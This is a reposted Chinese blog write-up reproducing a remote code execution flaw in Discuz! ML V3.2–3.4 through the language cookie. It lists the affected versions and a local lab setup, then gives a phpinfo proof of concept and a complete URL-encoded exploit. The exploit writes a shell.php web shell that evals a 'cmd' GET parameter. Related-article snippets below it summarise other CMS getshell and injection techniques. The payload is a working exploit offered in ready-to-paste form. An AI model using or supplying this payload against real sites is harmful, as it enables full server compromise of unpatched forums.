Discuz! ML RCE漏洞 getshell 复现

最新推荐文章于 2023-03-05 03:34:01 发布
最新推荐文章于 2023-03-05 03:34:01 发布
阅读量535 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/paperpen/p/11192154.html
版权

0x01 影响版本

Discuz! ML V3.2

Discuz! ML V3.3

Discuz! ML V3.4

 

0x02 环境搭建

直接官网下载即可http://discuz.ml/download

将压缩包解压至phpstudy网站根目录,浏览器访问upload目录即可开始安装

之后就是傻瓜式操作,一直点击下一步就可以了,直到完成安装

 

0x03 漏洞Poc

随便点击一个,抓包

将Cookie中的xxxxx_language参数值改为 '.phpinfo().' ,可以看到成功执行了代码

 

0x04 Getshell

EXP:

%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2547%2545%2554%255b%2522cmd%2522%255d%29%253b%253f%253e%27%29%29.%27

本地就多了一个shell.php文件

访问http://127.0.0.1/discuzml/upload/shell.php?cmd=phpinfo();即可看到成功执行了命令

参考文章:

 https://mp.weixin.qq.com/s/B5K9gr7Hhu7PlHk_H5WK2g

转载于:https://www.cnblogs.com/paperpen/p/11192154.html

weixin_30425949
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
duxcms SQL Injection In /admin/module/loginMod.class.php
weixin_30853329的博客
03-20 221
目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 duxcms是一款采用PHP开发,基于HMVC规则开发适合中小企业、公司、新闻、个人等相关行业的网站内容管理,它的后台登录处存在sql注入,黑客可通过这个漏洞获取管理员密码、直接任意用户登录后台等攻击 Relevant Link: ...
[代码审计]DuxCMS 2.0审计
Y4tacker的博客
04-19 900
文章目录DuxCMS 2.0审计后台登录页存在用户名密码爆破后台页面存在文件上传漏洞 看到CNVD爆出看了下easy的 DuxCMS 2.0审计 后台登录页存在用户名密码爆破 用户名不存在会爆不存在,验证码与token绑定不过期 import requests import time url = 'http://y4y4.top/s/system/Login/index' data = { 'username': 'adminzzz', 'password': 'zzzaddsadsadsaasd', '
Web安全漏洞与渗透测试 1.1 初探安全
玄魂工作室
06-06 604
Web安全漏洞与渗透测试 1.1 安全初探
DedeCMS 漏洞集合
收集盒 Book box
01-03 1395
DedeCMS会员中心分类管理SQL注射 需要magic_quotes_gpc = Off,所以说是鸡肋啊. 发生在数组key里的注射漏洞,有点意思. 这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下 http://www.1990day.com/member/mtypes.php?dopost=save exploit: mtypename[7
ThinkPHP历史漏洞复现
weixin_53747497的博客
03-05 1132
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。版本漏洞缓存函数设计缺陷可导致Getshell最新版update注入漏洞find_select_delete注入order_by注入漏洞sql注入漏洞
记一次tp5.0.24 getshell1
08-03
然而,我们发现了一个有趣的漏洞,即使TP5.0.24没有RCE漏洞,但是我们仍然可以使用EXP来getshell。 EXP的原理是利用ThinkPHP框架的__construct方法来执行恶意代码。在TP5.0.24中,我们可以使用EXP来执行phpinfo()...
LOG4J RCE 漏洞分享与自查.pdf
12-15
本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决方案。 漏洞原因: Log4j RCE 漏洞是由于 Log4j2 2.10.0 版本中的 Lookup 模块存在的漏洞。Lookup 模块允许用户在日志格式字符串中插入变量,从而...
duxcms内容管理系统 v1.1.0 稳定版.rar
07-10
DUXCMS是一款基于PHP MYSQL运行的开源建站系统,程序采用CANPHP框架编写,特别合适大小型公司企业、政府等使用。 程序特点: 1、小巧易用,程序压缩后大小只有1M左右,虽小功能却不简单,且尽可能的减少您的操作繁琐。2、功能实用,程序提供了基本企业站的实用功能,没有过多的多余功能,极大的方面了用户快速掌握程序的使用。3、多点缓存,程序采用数据库、模板、静态等缓存免去了生成静态的麻烦且访问效果和静态一样快速。4、简单的模板开发,程序采用了独有的模板标签来分离程序和界面的开发,标签简单易用让你快速开发出心仪的界面。5、附加模型字段,使用程序中往往会有多的字段需要使用比如产品编号等,这些可以使用附加模型来解决多余的字段功能。6、多功能表单,用户在后台可生成自己想要的表单功能,如留言板、友情链接、订房、表单反馈等,极大的减少了自主开发功能的难度。7、强大的技术支持,程序基于canphp框架结构编写,框架拥有完善的文档和帮助支持,使您二次开发、插件开发得心应手。8、开源免费,源码完全无加密开发,免去了您的后顾之忧,程序可免费无限制使用,但是禁止包皮发布。 运行环境: 操作系统:windows/linux/macosx服务器环境:apache2.X/IIS5 /NGNIX(需要开启INFO模式支持)PHP版本:5.2/5.3MYSQL版本:5.1及以上
【代码审计】XYHCMS V3.5代码执行漏洞分析
12-03 2516
  0x00 环境准备 XYHCMS官网:http://www.xyhcms.com/ 网站源码版本:XYHCMS V3.5(2017-12-04 更新) 程序源码下载:http://www.xyhcms.com/Show/download/id/2/at/0.html 测试网站首页: 0x01 代码分析 1、文件位置: /App/Manage/Controller/S...
phpstudy8.1安装duxcms3.1.3
weixin_44281516的博客
04-27 317
环境搭建,phpstudy8.1 1.源码下载https://github.com/duxphp/DuxCMS3 2.安装 Composer 配置成全局composer 配置环境变量 设置composer.json 运行composer install结果如下 运行完毕,生成vendor文件 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021042719391143.png 这个文件是必须要有的 如果没有Vendor文件则不可安装此cms 配置伪静态 成
生命在于学习——网站Getshell的方法
易水哲的博客
09-08 3659
网站Getshell的方法
漏洞复现phpStudy 小皮 Windows面板 RCE漏洞
做自己喜欢的事,并将其发挥到极致!
02-09 5167
Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE
mysql注入反弹_Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)
weixin_29915703的博客
01-28 532
### 简要描述:Discuz!x xss反弹后台无防御sql注入getshell,这里的xss只是做一个药引子,因为xss来自日志功能,然而这个日志功能却又默认关闭的,为了测试我们开启它。这个漏洞应该是所有dz通杀的,我下载了最新版本的所以测试通过......### 详细说明:首先我们开启日志功能,然后存储一个xss看看:测试一个xss页面:[](https://images.seebug.or...
1419.ml forum.php,discuz ml RCE漏洞重现及分析
weixin_35976717的博客
03-18 480
0x00 概述7月11日,在网上发现discuz ml(多国语言版)出现RCE漏洞的消息,漏洞在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。0x01 影响范围Discuz!ML v.3.4 ,Discuz!ML v.3.2 ,Discuz!ML v.3.3 product ofcodersclub.org0x02 漏洞重现让请求cookie含有xxxx_xxxx_...
DZ拿shell总结
weixin_30600503的博客
01-23 774
今天碰到一个dz的站,好久没拿了 ,拿下shell觉得应该总结一下 Uc_server默认密码 其实有了UC_SERVER就是有了网站的全部权限了,有了UC_SERVER你可以重置管理员密码 可以进后台拿shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿 先说一下UCkey拿shell,uckey可以进uc_server后台看 附一张dz3的图 当然有了uc-serv...
thinkphp5.0.23rce漏洞复现
最新发布
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值